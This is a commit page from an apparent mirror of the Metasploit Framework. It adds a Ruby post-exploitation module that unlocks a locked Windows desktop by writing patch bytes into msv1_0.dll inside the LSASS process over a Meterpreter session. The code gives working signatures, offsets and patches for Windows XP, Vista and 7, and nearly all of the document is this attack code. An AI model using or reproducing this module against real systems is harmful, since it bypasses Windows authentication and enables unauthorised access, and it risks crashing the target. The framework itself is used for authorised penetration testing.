infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Port the screen unlocker to a post module 

git-svn-id: file:///home/svn/framework3/trunk@11836 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2011-02-26 05:56:01 +00:00
parent 9bc2a2cd3a
commit c9c3ef4933
1 changed files with 108 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

108
modules/post/windows/escalate/screen_unlock.rb Normal file
View File

@ -0,0 +1,108 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'metasm'
class Metasploit3 < Msf::Post
def initialize(info={})
super(update_info(info,
'Name' => 'Microsoft Windows Locked Desktop Unlocker',
'Description' => %q{
This module unlocks a locked Windows desktop by patching
the respective code inside the LSASS.exe process. This
patching process can result in the target system hanging or
even rebooting, so be careful when using this module on
production systems.
},
'License' => MSF_LICENSE,
'Author' =>
[
'L4teral <l4teral[4t]gmail com>', # Meterpreter script
'Metlstorm' # Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16
],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ],
'References' =>
[
[ 'URL', 'http://www.storm.net.nz/projects/16' ]
]
))
register_options([
OptBool.new('REVERT', [false, "Enable this option to revert the in-memory patch and enable locking again", false])
], self.class)
end
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
def run
revert = datastore['REVERT']
targets = [
{ :sig => "8bff558bec83ec50a1", :sigoffset => 0x9927, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x99cc, :os => /Windows XP.*Service Pack 2/ },
{ :sig => "8bff558bec83ec50a1", :sigoffset => 0x981b, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x98c0, :os => /Windows XP.*Service Pack 3/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ }
]
unsupported if client.platform !~ /win32|win64/i
os = client.sys.config.sysinfo['OS']
targets.each do |t|
if os =~ t[:os]
target = t
print_status("OS '#{os}' found in known targets")
pid = client.sys.process["lsass.exe"]
p = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
dllbase = p.image["msv1_0.dll"]
sig = p.memory.read(dllbase + target[:sigoffset], target[:sig].length / 2).unpack("H*")[0]
if sig != target[:sig]
print_error("Found signature does not match")
next
end
old_code = p.memory.read(dllbase + target[:patchoffset], target[:orig_code].length / 2).unpack("H*")[0]
if !((old_code == target[:orig_code] && !revert) || (old_code == target[:patch] && revert))
print_error("Found code does not match")
next
end
print_status("Patching...")
new_code = revert ? target[:orig_code] : target[:patch]
p.memory.write(dllbase + target[:patchoffset], [new_code].pack("H*"))
written_code = p.memory.read(dllbase + target[:patchoffset], target[:patch].length / 2).unpack("H*")[0]
if ((written_code == target[:patch] && !revert) || (written_code == target[:orig_code] && revert))
print_status("Done!")
raise Rex::Script::Completed
else
print_error("Failed!")
next
end
end
end
print_error("No working target found")
end
end